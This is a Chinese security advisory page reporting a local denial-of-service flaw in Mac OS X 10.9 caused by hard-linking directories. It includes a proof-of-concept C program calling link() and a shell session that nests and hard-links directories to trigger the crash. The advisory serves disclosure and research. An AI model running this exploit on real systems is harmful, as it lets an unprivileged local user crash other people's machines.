Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Apple Mac OS X 硬链接本地拒绝服务漏洞

发布日期:2013-11-08
更新日期:2013-11-11受影响系统:
Apple Mac OS X 10.9
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 63612OS X(前称Mac OS X)是苹果公司为麦金塔电脑开发的专属操作系统的最新版本。Apple Mac OS X 10.9存在本地拒绝服务漏洞,本地未授权用户可利用此漏洞使受影响系统崩溃。<*来源:Maksymilian Arciemowicz (max@jestsuper.pl)
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!mac-cxs-XK:pochd XK$ cat test.c
#include <stdio.h>
#include <unistd.h>void usage(const char* program)
{
const char* message = " [src_dir] [target_dir]";
fprintf(stderr, "%s%s ", program, message);
}int main(int argc, char* argv[]) {
if (argc!=3) {
usage(argv[0]);
return 1;
}int ret = link(argv[1],argv[2]);fprintf(stderr,"link(3) return= %d ", ret);return ret;
}mac-cxs-XK:pochd XK$ gcc -o test test.c
mac-cxs-XK:pochd XK$ ls
test test.c
mac-cxs-XK:pochd XK$ mkdir DIR1
mac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1
link(3) return= -1
mac-cxs-XK:pochd XK$ mkdir DIR1/DIR2
mac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2
link(3) return= 0
mac-cxs-XK:pochd XK$ cd DIR1
mac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3
mac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3
link(3) return= 0
mac-cxs-XK:DIR1 XK$ cd DIR2
mac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4
mac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4
link(3) return= -1建议:
--------------------------------------------------------------------------------
厂商补丁:Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.apple.com/support/downloads/OpenSSH "sshd"进程远程内存破坏漏洞IBM Lotus Sametime Enterprise Meeting Server欺骗漏洞(CVE-2013-0537)相关资讯      Mac OS X 
  • 让Mac OS X专用高速移动硬盘在  (12/05/2015 22:46:23)
  • 苹果操作系统 OS X  (09/16/2014 07:10:13)
  • Mac OS X Mavericks 10.9.5 最新测  (08/14/2014 06:58:35)
  • 在 Mac OS X 系统中创建用于 Mac   (01/19/2015 11:47:14)
  • Ubuntu下使用VirtualBox安装Mac OS  (09/13/2014 09:11:16)
  • Ubuntu 14.04 下的MAC OS X 主题安  (07/29/2014 20:42:10)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图